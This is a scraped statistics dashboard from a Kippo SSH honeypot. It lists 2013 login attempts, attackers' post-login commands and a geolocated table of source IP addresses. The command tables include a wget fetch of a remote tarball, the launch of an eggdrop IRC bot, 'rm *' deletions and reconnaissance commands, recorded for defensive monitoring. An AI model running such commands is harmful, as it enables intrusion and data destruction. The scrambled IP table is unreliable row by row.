Source website: bruteforce.gr/kippo-graph
Overall honeypot activity Total login attempts
22343
Distinct source IP addresses
138
Active time period Start date (first attack) Tuesday, 09-Apr-2013, 20:22 PM
End date (last attack) Saturday, 11-May-2013, 10:29 AM
Graphical statistics generated from your Kippo honeypot database
Top 10 passwords This vertical bar chart diplays the top 10 passwords that attackers try when attacking the system.
Top 10 usernames This vertical bar chart diplays the top 10 usernames that attackers try when attacking the system.
Top 10 user-pass combos This vertical bar chart diplays the top 10 username and password combinations that attackers try when attacking the system.
This pie chart diplays the top 10 username and password combinations that attackers try when attacking the system.
Success ratio This vertical bar chart diplays the overall attack success ratio for the particular honeypot system.
Successes per day/week This vertical bar chart diplays the most successful break-ins per day (Top 20) for the particular honeypot system. The numbers indicate how many times correct credentials were given by attackers.
This line chart diplays the daily successes on the honeypot system. Spikes indicate successful entries over a weekly period. Warning: Dates with zero successes are not displayed.
This line chart diplays the weekly successes on the honeypot system. Curves indicate successful entries over a weekly period.
Connections per IP This vertical bar chart diplays the top 10 unique IPs ordered by the number of overall connections to the system.
This pie chart diplays the top 10 unique IPs ordered by the number of overall connections to the system.
Successful logins from the same IP This vertical bar chart diplays the number of successful logins from the same IP address (Top 20). The numbers indicate how many times the particular source opened a successful session.
Probes per day/week This horizontal bar chart diplays the most probes per day (Top 20) against the honeypot system.
This line chart diplays the daily activity on the honeypot system. Spikes indicate hacking attempts. Warning: Dates with zero probes are not displayed.
This line chart diplays the weekly activity on the honeypot system. Curves indicate hacking attempts over a weekly period.
Top 10 SSH clients This vertical bar chart diplays the top 10 SSH clients used by attackers during their hacking attempts.
Copyright Š 2011, 2012 - All Rights Reserved - Kippo-Graph
Thanks to OS Templates
Source website: bruteforce.gr/kippo-graph
Input presentation and statistics gathered from the honeypot system Overall post-compromise activity Post-compromise human activity Total number of commands 122
Distinct number of commands 72 Downloaded files
Total number of downloads 1
Distinct number of downloads 1
Human activity inside the honeypot The following vertical bar chart visualizes the top 20 busiest days of real human activity, by counting the number of input to the system.
The following line chart visualizes real human activity per day, by counting the number of input to the system for each day of operation. Warning: Dates with zero input are not displayed.
The following line chart visualizes real human activity per week, by counting the number of input to the system for each day of operation.
Top 10 input (overall) The following table diplays the top 10 commands (overall) entered by attackers in the honeypot system. ID
Input
Count
1
ls
20
2
exit
7
3
cd ..
7
4
ls -a
3
5
poweroff -h
3
6
poweroff
3
7
top
3
8
ls -l
3
9
test
2
10
w
2
This vertical bar chart visualizes the top 10 commands (overall) entered by attackers in the honeypot system.
Top 10 successful input The following table diplays the top 10 successful commands entered by attackers in the honeypot system. ID
Input (success)
Count
1
ls
20
2
exit
7
3
cd ..
7
4
ls -a
3
5
ls -l
3
6
w
2
7
mkdir TEST
2
8
rm *
2
9
rmdir *
2
10
logout
2
This vertical bar chart visualizes the top 10 successful commands entered by attackers in the honeypot system.
Top 10 failed input The following table diplays the top 10 failed commands entered by attackers in the honeypot system. ID
Input (fail)
Count
1
poweroff -h
3
2
poweroff
3
3
top
3
4
help
2
5
sudo rmdir *
2
6
test
1
7
halt -h
1
8
halt -n
1
9
halt
1
10
?
1
This vertical bar chart visualizes the top 10 failed commands entered by attackers in the honeypot system.
passwd commands The following table diplays the latest "passwd" commands entered by attackers in the honeypot system. ID
Timestamp
Input
1
Wednesday, 24-Apr-2013, 09:11 AM
tst
2
Wednesday, 24-Apr-2013, 09:11 AM
test
wget commands The following table diplays the latest "wget" commands entered by attackers in the honeypot system.
ID 1
Input
File link
wget rom.do.am/enou.tgz
NoVirusThanks
http://anonym.to/?http://rom.do.am/enou.tgz
Scan File
Executed scripts The following table diplays the latest executed scripts by attackers in the honeypot system. ID 1
Timestamp Monday, 06-May-2013, 17:06 PM
Input ./eggdrop-1.6.17 -m bot1.conf
Interesting commands The following table diplays other interesting commands executed by attackers in the honeypot system. ID
Timestamp
Input
1
Monday, 06-May-2013, 17:06 PM
cat /proc/cpuinfo
2
Wednesday, 01-May-2013, 12:16 PM
cat /etc/issue
3
Wednesday, 24-Apr-2013, 20:26 PM
ifconfig
Copyright Š 2011, 2012 - All Rights Reserved - Kippo-Graph
Thanks to OS Templates
Source website: bruteforce.gr/kippo-graph
Geolocation information gathered from the IP addresses probing the Kippo SSH Honeypot The following table displays the top 10 IP addresses connected to the system (ordered by volume of connections). ID
IP Address
Probes
City
1
93.63.201.220
5258
Rome
2
103.23.100.173
4268
3
69.28.57.87
4021
4
37.140.248.6
1136
5
117.135.241.112
840
Beijing
6
1.25.202.50
573
Baotou
7
190.0.17.43
484
8
60.191.220.106
9
Region
Code
Latitude
Longitude
Hostname
Italy
IT
41.900002
12.4833
smtp.sinfarma.it
Indonesia
ID
-5
120
173.subnet-103.23.100.host.unnes.ac.id
United States
US
33.978199
-117.903999
69.28.57.87
Jordan
JO
31
36
37.140.248.6
Beijing
China
CN
39.928902
116.388298
117.135.241.112
Nei Mongol
China
CN
40.652199
109.822197
1.25.202.50
Antioquia
Colombia
CO
6.2518
-75.563599
Wimax-Cali-190-0-17-43.orbitel.net.co
457
China
CN
35
105
60.191.220.106
5.178.87.121
422
Russian Federation
RU
60
100
5.178.87.121
10
202.102.111.179
383
Nanjing
Jiangsu
China
CN
32.061699
118.777802
202.102.111.179
11
173.208.210.111
317
Kansas City
MO
United
US
39.1068
-94.566002
173.208.210.111
Rowland Heights
Latium
Country Name
CA
States
12
218.237.65.47
284
Seocho
Seoul
Korea, Republic of
KR
37.490601
127.019997
218.237.65.47
13
108.174.151.58
275
Denver
CO
United States
US
39.705502
-104.9664
108-174-151-58.worldwidewebhosting.com
14
58.225.75.228
262
Seoul
Seoul
Korea, Republic of
KR
37.598499
126.978302
58.225.75.228
15
37.153.99.247
262
Netherlands
NL
52.5
5.75
37.153.99.247
16
79.172.10.78
257
Russian Federation
RU
56.851898
60.612202
79.172.10.78.ural.ru
Yekaterinburg Sverdlovsk
Lookup
Federation
17
220.161.148.178
218
Putian
Fujian
China
CN
24.987801
118.498299
220.161.148.178
18
42.121.56.31
165
Hangzhou
Zhejiang
China
CN
30.2936
120.1614
42.121.56.31
19
88.190.44.131
147
Paris
Île-deFrance
France
FR
48.866699
2.3333
88-190-44-131.rev.dedibox.fr
20
92.86.121.113
128
Bucharest
Bucureşti
Romania
RO
44.4333
26.1
adsl92-86-121-113.romtelecom.net
21
62.193.248.117
122
Amen
ProvenceAlpes-Côte d'Azur
France
FR
44.048302
6.8698
wpc4027.amenworld.com
22
173.44.236.68
97
Henderson
NV
United States
US
36.0312
-115.073898
173.44.236.68
23
121.254.224.145
96
Seoul
Seoul
Korea, Republic of
KR
37.598499
126.978302
121.254.224.145
24
176.99.6.220
90
Russian Federation
RU
60
100
1056.globatel.ru
25
61.156.238.56
88
Jinan
Shandong
China
CN
36.668301
116.9972
61.156.238.56
26
61.236.64.56
84
Beijing
Beijing
China
CN
39.928902
116.388298
61.236.64.56
27
1.255.3.116
77
Australia
AU
-27
133
1.255.3.116
28
60.10.203.18
72
Hebei
Hebei
China
CN
39.889702
115.275002
60.10.203.18
29
119.161.208.2
70
Beijing
Beijing
China
CN
39.928902
116.388298
119.161.208.2
30
180.96.23.74
60
Nanjing
Jiangsu
China
CN
32.061699
118.777802
180.96.23.74
31
37.247.104.243
60
Sanayi
Antalya Province
Turkey
TR
36.903099
30.6991
host-37-247-104-243.routergate.com
32
124.160.194.27
58
Hangzhou
Zhejiang
China
CN
30.2936
120.1614
124.160.194.27
33
96.45.168.34
58
Canyon Country
CA
United States
US
34.406502
-118.401497
34.168.45.96-dedicated.multacom.com
34
211.154.163.149
57
Beijing
Beijing
China
CN
39.928902
116.388298
211.154.163.149
35
220.128.241.128 52
T'ai-wan
Taiwan
TW
24.9869
121.305603
vcs.mediland.com.tw
36
124.92.127.194
51
Shenyang
Liaoning Province
China
CN
41.792198
123.4328
124.92.127.194
37
58.248.38.108
50
Guangzhou
Guangdong China
CN
23.116699
113.25
58.248.38.108
38
202.136.60.142
48
China
CN
35
105
202.136.60.142
39
202.85.213.179
42
China
CN
35
105
202.85.213.179
40
46.21.161.37
41
Netherlands
NL
52.5
5.75
no-record-set.rijndata.nl
41
117.79.91.214
40
Beijing
Beijing
China
CN
39.928902
116.388298
117.79.91.214
42
221.176.185.229
37
Xinyang
Henan
China
CN
32.095798
114.1203
221.176.185.229
43
200.222.101.118
37
Brazil
BR
-10
-55
mailz.riodasostras.rj.gov.br
44
202.100.221.46
36
Haikou
Hainan Province
China
CN
20.045799
110.341698
202.100.221.46
45
189.3.61.50
36
Caxias
Maranh達o
Brazil
BR
-4.8333
-43.349998
189.3.61.50
46
122.72.120.115
33
Beijing
Beijing
China
CN
39.928902
116.388298
122.72.120.115
47
218.200.177.234 33
Chengdu
Sichuan
China
CN
30.6667
104.066704
218.200.177.234
48
122.72.120.105
32
Beijing
Beijing
China
CN
39.928902
116.388298
122.72.120.105
49
94.242.252.47
31
Luxembourg LU
49.75
6.1667
ip-static-94-242-252-47.as5577.net
50
77.221.104.75
27
Makkah
Saudi Arabia
SA
21.516899
39.2192
77.221.104.75
51
177.135.154.60
26
S達o Paulo
Brazil
BR
-23.473301 -46.665798
multiplusfidelidade.static.gvt.net.br
52
70.183.21.153
26
CA
United States
US
33.745399
wsip-70-183-21-153.oc.oc.cox.net
Jeddah
Santa Ana
-117.891998
53
183.60.20.36
26
Guangzhou
Guangdong China
CN
23.116699
113.25
183.60.20.36
54
202.103.36.43
24
Wuhan
Hubei
China
CN
30.580099 114.273399
202.103.36.43
55
94.141.130.162
24
Bydgoszcz
KujawskoPomorskie Voivodship
Poland
PL
53.127102
18.02
162-host.alfa.pl
56
42.120.22.86
23
Hangzhou
Zhejiang
China
CN
30.2936
120.1614
42.120.22.86
57
47.21.145.210
23
United States
US
38
-97
ool-2f1591d2.static.optonline.net
58
113.57.238.30
22
Wuhan
Hubei
China
CN
30.580099 114.273399
113.57.arpa.hb.cnc.cn
59
219.148.203.133
21
Shenyang
Liaoning Province
China
CN
41.792198
123.4328
219.148.203.133
60
223.82.244.22
20
Beijing
Beijing
China
CN
39.928902
116.388298
223.82.244.22
61
109.70.149.222
19
United Kingdom
GB
51.5
-0.13
222-149-109.gamingdeluxe.co.uk
62
209.92.176.41
18
Allentown
PA
United States
US
40.6152
-75.543701
reverse.in-addr.arpa
63
119.36.186.44
18
Wuhan
Hubei
China
CN
30.580099 114.273399
119.36.arpa.hb.cnc.cn
64
81.23.20.8
15
Kiev
Misto Kyyiv
Ukraine
UA
50.4333
30.516701
81-23-20-8-vpn.gprs.kyivstar.net
65
203.34.37.37
15
Mongolia
MN
46
105
203.34.37.37
66
174.142.53.50
15
Montreal
QC
Canada
CA
45.5
-73.583298
mail.rayara.com
67
210.77.16.234
13
Beijing
Beijing
China
CN
39.928902
116.388298
210.77.16.234
68
145.253.72.3
13
Germany
DE
51
9
145.253.72.3
69
211.95.76.242
12
Beijing
Beijing
China
CN
39.928902
116.388298
211.95.76.242
70
59.175.148.95
11
Wuhan
Hubei
China
CN
30.580099 114.273399
95.148.175.59.broad.wh.hb.dynamic.163data.com.cn
71
221.224.33.70
11
Suzhou
Jiangsu
China
CN
31.3041
120.595398
221.224.33.70
72
114.66.192.70
11
Beijing
Beijing
China
CN
39.928902
116.388298
114.66.192.70
73
122.72.120.107
10
Beijing
Beijing
China
CN
39.928902
116.388298
122.72.120.107
74
196.41.208.194
9
Springs
Gauteng
South Africa
ZA
-26.25
28.4
mail.pdna.co.za
75
106.3.242.126
9
Beijing
Beijing
China
CN
39.928902
116.388298
106.3.242.126
76
61.142.106.34
8
Zhongshan
Guangdong China
CN
21.322599
110.582901
61.142.106.34
77
220.248.83.20
8
Shanghai
Shanghai
China
CN
31.045601
121.399696
220.248.83.20
78
67.205.68.105
8
Montreal
QC
Canada
CA
45.5
-73.583298
67.205.68.105
79
50.57.144.86
8
San Antonio
TX
United States
US
29.488899
-98.398697
50-57-144-86.static.cloud-ips.com
80
123.30.173.96
8
Ho Chi Minh City
Hồ Chí Minh
Vietnam
VN
10.8142
106.643799
static.vdc.vn
81
189.26.255.11
7
Salvador
Bahia
Brazil
BR
-12.9833
-38.516701
189.26.255.11.static.gvt.net.br
82
60.220.225.214
6
Changzhi
Shanxi
China
CN
36.045799
113.044197
214.225.220.60.adsl-pool.sx.cn
83
50.115.166.46
6
Kansas City
MO
United States
US
39.1068
-94.566002
50.115.166.46
84
94.142.155.123
6
Iceland
IS
65
-18
94.142.155.123
85
203.231.233.18
5
Korea, Republic of
KR
37
127.5
203.231.233.18
86
62.217.127.90
5
Greece
GR
39
22
helpdesk.vm.aspete.gr
87
185.19.93.203
4
Sanayi
Antalya Province
Turkey
TR
36.903099
30.6991
host-185-19-93-203.ttnetdc.com
88
122.72.82.81
4
Beijing
Beijing
China
CN
39.928902
116.388298
122.72.82.81
89
221.192.143.73
4
Hebei
Hebei
China
CN
39.889702
115.275002
221.192.143.73
90
219.138.203.198 4
Ezhou
Hubei
China
CN
30.396099
114.886497
219.138.203.198
91
61.155.177.58
4
Nanjing
Jiangsu
China
CN
32.061699
118.777802
61.155.177.58
92
202.112.112.236
3
Beijing
Beijing
China
CN
39.928902
116.388298
202.112.112.236
93
204.185.46.18
3
Columbia
MO
United States
US
38.881699
-92.402
204.185.46.18
94
211.103.34.61
3
Beijing
Beijing
China
CN
39.928902
116.388298
211.103.34.61
95
118.145.25.104
3
Beijing
Beijing
China
CN
39.928902
116.388298
118.145.25.104
96
2.238.127.234
3
Valenza
Piedmont
Italy
IT
45.016701
8.6333
2-238-127-234.ip244.fastwebnet.it
97
77.251.217.15
3
Weesp
North Holland
Netherlands
NL
52.307701
5.0397
dhcp-077-251-217-015.chello.nl
98
222.34.19.247
3
Beijing
Beijing
China
CN
39.928902
116.388298
222.34.19.247
99
182.118.23.141
2
Zhengzhou
Henan
China
CN
34.683601
113.532501
hn.kd.ny.adsl
100 152.104.213.5
2
Hong Kong
HK
22.25
114.166702
static-ip-5-213-104-152.anlai.com
101
2
China
CN
35
105
61.164.147.2
61.164.147.2
102 113.107.101.219
2
Guangzhou
Guangdong China
CN
23.116699
113.25
113.107.101.219
103 211.90.12.9
2
Beijing
Beijing
China
CN
39.928902
116.388298
211.90.12.9
104 219.144.17.74
2
Xian
Shaanxi
China
CN
34.258301
108.928596
219.144.17.74
105
2
Nanchang
Jiangxi
China
CN
28.549999
115.933296
117.21.182.50
106 219.222.224.22
2
Guangzhou
Guangdong China
CN
23.116699
113.25
219.222.224.22
107
2
Los Angeles
CA
US
34.0522
-118.243698
69.172.215.246
117.21.182.50
69.172.215.246
United States
States
108 188.225.190.57
2
Palestinian Territory
PS
32
35.25
188.225.190.57
109 218.104.145.140
2
China
CN
35
105
218.104.145.140
110
71.248.125.231
2
United States
US
39.402
-76.632896
static-71-248-125-231.bltmmd.east.verizon.net
111
103.23.125.25
2
India
IN
20
77
103.23.125.25
112
69.39.136.12
1
Indianapolis
IN
United States
US
39.768398
-86.157997
12.136.39.69.static.egix.net
113
82.137.15.47
1
Bucharest
BucureĹ&#x;ti
Romania
RO
44.4333
26.1
82-137-15-47.rdsnet.ro
114
79.114.226.20
1
Satu Mare
Satu Mare
Romania
RO
47.799999
22.883301
79-114-226-20.rdsnet.ro
115
218.59.215.185
1
Jinan
Shandong
China
CN
36.668301
116.9972
218.59.215.185
116
5.39.89.200
1
France
FR
46
2
ks3276722.kimsufi.com
117
137.117.13.65
1
United States
US
38
-97
137.117.13.65
118
37.182.85.128
1
Italy
IT
42.833302
12.8333
37.182.85.128
119
80.115.223.60
1
Russian Federation
RU
51.5406
46.008598
oxota.ws
120 81.20.195.234
1
Russian Federation
RU
60
100
g-kondi.sc.ru
121
91.193.121.90
1
Poland
PL
52
20
91.193.121.90
122
198.211.116.18
1
New York
NY
United States
US
40.7267
-73.9981
198.211.116.18
123
211.142.247.67
1
Xiangtan
Hunan Province
China
CN
28.6411
111.7789
211.142.247.67
124
122.49.48.70
1
Beijing
Beijing
China
CN
39.928902
116.388298
122.49.48.70
125
174.34.145.74
1
Seattle
WA
United States
US
47.489101
-122.290802 174.34.145.74.rdns.ubiquity.io
Towson
Saratov
MD
Saratov
126
198.148.101.62
1
Canyon Country
CA
United States
US
34.406502
-118.401497
62-101-148-198-dedicated.multacom.com
127
46.102.12.148
1
Ploiesti
Prahova
Romania
RO
44.950001
26.016701
46.102.12.148
128 182.131.22.211
1
Chengdu
Sichuan
China
CN
30.6667
104.066704
182.131.22.211
129
1
Satu Mare
Satu Mare
Romania
RO
47.799999
22.883301
79-114-235-54.rdsnet.ro
130 211.142.247.66
1
Xiangtan
Hunan Province
China
CN
28.6411
111.7789
211.142.247.66
131
122.165.87.196
1
Chennai
Tamil NÄ du
India
IN
13.0833
80.283302
ABTS-TN-Static-196.87.165.122.airtelbroadband.in
132
189.211.50.117
1
Mexico
The Federal District
Mexico
MX
19.4342
-99.138603
189-211-50-117.static.axtel.net
133
110.75.188.37
1
Hangzhou
Zhejiang
China
CN
30.2936
120.1614
UNKNOWN-110-75-188-37.aliyun.com
134
88.191.160.75
1
Paris
ĂŽle-deFrance
France
FR
48.866699
2.3333
88-191-160-75.rev.dedibox.fr
135
54.251.223.249
1
Singapore
SG
1.3667
103.800003
ec2-54-251-223-249.ap-southeast1.compute.amazonaws.com
136
76.74.129.236
1
Canada
CA
60
-95
76.74.129.236
137
61.100.186.34
1
Korea, Republic of
KR
37
127.5
61.100.186.34
138
111.4.124.11
1
Beijing
Beijing
China
CN
39.928902
116.388298
111.4.124.11
139
79.113.138.233
1
Focsani
Vrancea
Romania
RO
45.700001
27.1833
79-113-138-233.rdsnet.ro
1
Quito
Pichincha
Ecuador
EC
-0.2167
-78.5
186.46.93.75
79.114.235.54
140 186.46.93.75
The following zoomable world map marks the geographic locations of the top 10 IPs according to their latitude and longitude values. Click on them to get the full information available from the database.
Map data Š2013 MapLink Imagery Š2013 NASA, TerraMetrics
The following Intensity Map shows the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.
1
5262
The following pie chart visualizes the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.
Geolocation by geoPlugin
Copyright Š 2011, 2012 - All Rights Reserved - Kippo-Graph
Thanks to OS Templates